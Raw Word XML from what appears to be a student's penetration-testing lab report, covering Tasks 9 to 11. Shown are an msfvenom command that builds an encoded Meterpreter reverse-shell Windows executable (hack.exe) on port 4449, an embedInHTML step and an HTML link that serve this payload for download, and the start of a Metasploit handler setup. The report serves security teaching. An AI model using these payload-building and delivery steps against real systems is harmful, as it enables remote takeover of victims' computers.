      <w:bookmarkStart w:id="14" w:name="_Toc20508509"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Task 9:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="72DDBD08" w14:textId="1DB04164" w:rsidR="008B560C" w:rsidRDefault="00562759" w:rsidP="00E56474">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00562759">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00562759">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>MSFvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00562759">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> create an executable version of Meterpreter (payload) that connects to the port </w:t>
      </w:r>
      <w:r w:rsidRPr="00562759">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4449</w:t>
      </w:r>
      <w:r w:rsidRPr="00562759">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t> for a windows system. The payload must be an executable windows file (.exe). What command did you use?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC95C3E" w14:textId="00E471DF" w:rsidR="00562759" w:rsidRDefault="00562759" w:rsidP="00E56474">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56F12617" w14:textId="332E478F" w:rsidR="00562759" w:rsidRDefault="00562759" w:rsidP="00E56474">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is the command I used to create an executable version of Meterpreter using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>MSFvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117C0335" w14:textId="5D93BBF4" w:rsidR="00562759" w:rsidRDefault="00562759" w:rsidP="00E56474">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12B66882" w14:textId="5475A456" w:rsidR="00562759" w:rsidRDefault="005627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30668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usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msfvenom</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r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> LPORT</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LHOST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w:t>
      </w:r>
      <w:r w:rsidR="002232F4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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x86 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>e x86</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>shikata_ga_nai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exe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">platform windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> hack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079E6639" w14:textId="050E5850" w:rsidR="00562759" w:rsidRDefault="00562759" w:rsidP="00114AC1">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125EBA4D" w14:textId="363E9F3B" w:rsidR="00A83F58" w:rsidRDefault="00A83F58" w:rsidP="00114AC1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>-p = payload, -a = architecture, -e = encoder and -f = file format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6F7CAB" w14:textId="77777777" w:rsidR="00A83F58" w:rsidRPr="00114AC1" w:rsidRDefault="00A83F58" w:rsidP="00114AC1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="422D4928" w14:textId="01222554" w:rsidR="008B560C" w:rsidRDefault="00114AC1" w:rsidP="00114AC1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc20508510"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Task 10:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="3BB41500" w14:textId="3CA0C601" w:rsidR="00114AC1" w:rsidRPr="00114AC1" w:rsidRDefault="00114AC1" w:rsidP="00114AC1">
      <w:r w:rsidRPr="00114AC1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Next start the Apache2 service (service apache2 start) and delete everything in the directory /var/www/html. Copy the payload you just created to that folder and create an HTML file with a link to the payload. Report the created HTML file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1557BB24" w14:textId="77777777" w:rsidR="008B560C" w:rsidRPr="00E56474" w:rsidRDefault="008B560C" w:rsidP="00E56474">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B1AEE5F" w14:textId="17DE3C25" w:rsidR="00941781" w:rsidRDefault="00114AC1" w:rsidP="00334CCC">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Originally, I used a python utility called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00114AC1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>embedInHTML</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> to create a website that auto prompts the end user to download a file upon accessing the website. Here’s the command I used to create said website:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B61A81" w14:textId="3C239025" w:rsidR="00114AC1" w:rsidRDefault="00114AC1" w:rsidP="00941781">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71C24B78" w14:textId="77777777" w:rsidR="00114AC1" w:rsidRDefault="00114A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8879"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>python embedInHTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">py </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">k data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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Desktop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">exe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>o hack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>html </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390B1B85" w14:textId="7E9EB951" w:rsidR="00114AC1" w:rsidRDefault="00114AC1" w:rsidP="00941781">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E59FA87" w14:textId="6A5224EE" w:rsidR="00114AC1" w:rsidRDefault="00114AC1" w:rsidP="00941781">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">This command produced the following website </w:t>
      </w:r>
      <w:r w:rsidR="002232F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>when the html file was accessed through the internet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A384346" w14:textId="5A3E0B29" w:rsidR="00114AC1" w:rsidRDefault="00114AC1" w:rsidP="00114AC1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00FF3F5E" wp14:editId="1FDBAD5D">
            <wp:extent cx="2515536" cy="1887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121" cy="1917021"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B746FF" w14:textId="78600A85" w:rsidR="002232F4" w:rsidRDefault="00114AC1" w:rsidP="00114AC1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>However, the html code was too long to share here. So</w:t>
      </w:r>
      <w:r w:rsidR="002232F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> I came up with an alternative </w:t>
      </w:r>
      <w:r w:rsidR="002232F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>website. Here’s the HTML code for it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6243CF8E" w14:textId="3C74FA0C" w:rsidR="002232F4" w:rsidRDefault="002232F4" w:rsidP="00114AC1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E2275EC"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8096955"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="atn"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="atv"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>”hack.exe</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="atv"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="atn"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>download</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Download File</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDAB50E" w14:textId="77777777" w:rsidR="002232F4" w:rsidRDefault="002232F4" w:rsidP="00114AC1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="152B100C" w14:textId="7771D4BF" w:rsidR="00A83F58" w:rsidRDefault="00A83F58" w:rsidP="00114AC1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>This is what the website looked like:</w:t>
      </w:r>
      <w:r w:rsidR="002232F4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FB98B9" w14:textId="77777777" w:rsidR="003C3921" w:rsidRDefault="003C3921" w:rsidP="00114AC1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7262F9F6" w14:textId="7E9FC605" w:rsidR="00A83F58" w:rsidRDefault="00A83F58" w:rsidP="00A83F58">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="592E4870" wp14:editId="065FC468">
            <wp:extent cx="3152851" cy="23617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584" cy="2372063"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="647A671C" w14:textId="77777777" w:rsidR="002232F4" w:rsidRDefault="002232F4" w:rsidP="00114AC1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="300F3B8D" w14:textId="116BCEBB" w:rsidR="002232F4" w:rsidRDefault="002232F4" w:rsidP="002232F4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc20508511"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Task 11:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="6FE6909B" w14:textId="5C45E68D" w:rsidR="002232F4" w:rsidRDefault="002232F4" w:rsidP="002232F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002232F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Open Metasploit (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002232F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002232F4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>) and using the multi/handler module create a server that listens to the port 4449 (same port as the Meterpreter you just configured). Report how you did it and the commands you used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AAA8D6" w14:textId="2E1BC5A7" w:rsidR="002232F4" w:rsidRDefault="002232F4" w:rsidP="002232F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
